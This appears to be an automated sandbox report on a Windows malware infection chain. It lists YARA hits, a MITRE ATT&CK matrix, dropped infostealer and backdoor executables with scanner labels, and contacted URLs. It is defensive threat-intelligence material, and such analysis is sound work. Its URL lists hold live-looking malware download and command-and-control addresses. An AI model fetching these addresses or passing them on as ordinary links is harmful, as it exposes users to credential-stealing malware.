Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e32000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e0c000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e58000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 52ba7a538c.exe PID: 6324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3176, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C610C40 sqlite3_bind_zeroblob,	3_2_6C610C40
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C610D60 sqlite3_bind_parameter_name,	3_2_6C610D60
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C538EA0 sqlite3_clear_bindings,	3_2_6C538EA0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C610B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6C610B40
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C536410 bind,WSAGetLastError,	3_2_6C536410
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C53C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	3_2_6C53C050
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C536070 PR_Listen,	3_2_6C536070
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C53C030 sqlite3_bind_parameter_count,	3_2_6C53C030
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5360B0 listen,WSAGetLastError,	3_2_6C5360B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4C22D0 sqlite3_bind_blob,	3_2_6C4C22D0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5363C0 PR_Bind,	3_2_6C5363C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	1 Extra Window Memory Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	13 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	111 Registry Run Keys / Startup Folder	412 Process Injection	131 Obfuscated Files or Information	1 Credentials in Registry	3510 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	11 Scheduled Task/Job	13 Software Packing	NTDS	11 Query Registry	Distributed Component Object Model	1 Email Collection	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	111 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1181 Security Software Discovery	SSH	1 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	581 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	581 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
i8Vwc7iOaG.exe	58%	ReversingLabs	Win32.Trojan.Generic
i8Vwc7iOaG.exe	64%	Virustotal		Browse
i8Vwc7iOaG.exe	100%	Avira	TR/Crypt.XPACK.Gen
i8Vwc7iOaG.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\legs[1].exe	96%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	48%	ReversingLabs	Win32.Exploit.Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe	48%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k0ukcEH[1].exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	68%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	35%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe	91%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe	79%	ReversingLabs	Win32.Trojan.Whispergate
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\projectspecificpro[1].exe	57%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	57%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\goldddd123[1].exe	81%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nnmp[1].exe	17%	ReversingLabs	Win32.Trojan.Xiclog
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRat
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ukX1YE2[1].exe	57%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1001527001\legs.exe	96%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1004899001\am209.exe	79%	ReversingLabs	Win32.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\1006343001\goldddd123.exe	81%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe	91%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\1008664001\nnmp.exe	17%	ReversingLabs	Win32.Trojan.Xiclog
C:\Users\user\AppData\Local\Temp\1008788001\projectspecificpro.exe	57%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	48%	ReversingLabs	Win32.Exploit.Vidar
C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	57%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRat
C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe	48%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	68%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1023283001\4f6ebb22d5.exe	57%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1023284001\5f7e5e6f99.exe	35%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1023286001\5f4a2ffa3a.exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1023287001\98f8ef74ec.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaiintain.exe	32%	ReversingLabs

Source	Detection	Scanner	Label
screwamusresz.buzz	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/nss3.dllis	100%	Avira URL Cloud	malware
cashfuzysao.buzz	0%	Avira URL Cloud	safe
http://31.41.244.11/files/outlookzaliv/random.exe	100%	Avira URL Cloud	phishing
http://31.41.244.11/files/6046979003/k0ukcEH.exe	100%	Avira URL Cloud	phishing
https://mindhandru.buzz/api	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php57b32d1dd2300446feeffeb11b9axtension	100%	Avira URL Cloud	malware
https://api.telegram.orgD	0%	Avira URL Cloud	safe
https://mindhandru.buzz:443/api	100%	Avira URL Cloud	malware
https://d4chil.xyzge	0%	Avira URL Cloud	safe
http://185.215.113.16/mine/random.exeM$R	0%	Avira URL Cloud	safe
http://31.41.244.11/files/winston/random.exeH&t	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exej	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exed	0%	Avira URL Cloud	safe
http://31.41.244.11/files/winston/random.exe?	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exea	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5195048147/hmUaBuJ.exe	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exeW	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exe6ncoded	0%	Avira URL Cloud	safe
http://31.41.244.11/files/martin/random.exe(	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exec	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exe=	0%	Avira URL Cloud	safe
undesirabkel.click	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
screwamusresz.buzz	true	Avira URL Cloud: safe	unknown
cashfuzysao.buzz	true	Avira URL Cloud: safe	unknown
undesirabkel.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001277000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/outlookzaliv/random.exe	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://polymer.github.io/AUTHORS.txt	chrome.exe, 0000001E.00000003.3597537251.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3597585144.0000599C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3597636556.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3593825702.0000599C00F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3594405336.0000599C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/7B7P	t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://unisolated.invalid/	chrome.exe, 0000001E.00000002.4122481049.0000599C009EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001294000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/api	i8Vwc7iOaG.exe, 00000000.00000003.2205272038.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483274596.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483422066.0000000001262000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348956952.0000000001264000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docs.googl0	chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900	k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php57b32d1dd2300446feeffeb11b9axtension	Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000D0C000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
https://anglebug.com/7489	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dllis	Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001294000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://polymer.github.io/PATENTS.txt	chrome.exe, 0000001E.00000003.3597537251.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3597585144.0000599C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3597636556.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3593825702.0000599C00F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3594405336.0000599C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/6046979003/k0ukcEH.exe	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 0000001E.00000002.4063178908.0000599C0050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/api	k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535546010.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.0000000001702000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538667957.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.0000000001701000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 0000001E.00000002.4063178908.0000599C0050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-4.c	chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/file/bot	t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	false		high
http://api.telegram.org	t0IHakP.exe, 0000001D.00000002.4813359985.0000000003608000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phph	Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001294000.00000004.00000020.00020000.00000000.sdmp	false		high
https://d4chil.xyzge	BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
